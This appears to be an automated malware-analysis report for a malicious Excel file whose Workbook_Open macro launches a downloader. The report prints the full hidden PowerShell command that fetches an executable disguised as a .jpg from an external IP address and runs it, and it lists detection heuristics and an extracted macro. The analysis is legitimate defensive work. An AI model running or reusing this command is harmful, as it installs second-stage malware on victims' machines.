Malware Insights
The Workbook_Open macro fires, indicating automatic execution upon opening the spreadsheet. The embedded PowerShell command is reconstructed as: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://35.178.75.69/8/907840.jpg -OutFile C:\Users\Public\Videos\cybtfsv.exe}; & {Start-Process -FilePath \"C:\Users\Public\Videos\cybtfsv.exe\"}". This command downloads a file from http://35.178.75.69/8/907840.jpg to C:\Users\Public\Videos\cybtfsv.exe and then executes it. This indicates the document is a downloader for a second-stage payload.
Heuristics 7
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Visible LOLBin command execution instruction high SE_LOLBIN_RUN_COMMANDDocument contains instructions or visible command text involving Windows script/execution tools such as PowerShell, mshta, cmd, rundll32, or regsvr32
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://35.178.75.69/8/907840.jpg
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.base955038ece6d76512ab6494536a976618e64d2a5afbbf911e528fb69f64b62db |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1776 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved macro source contains an auto-exec entry point and execution/download terms.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.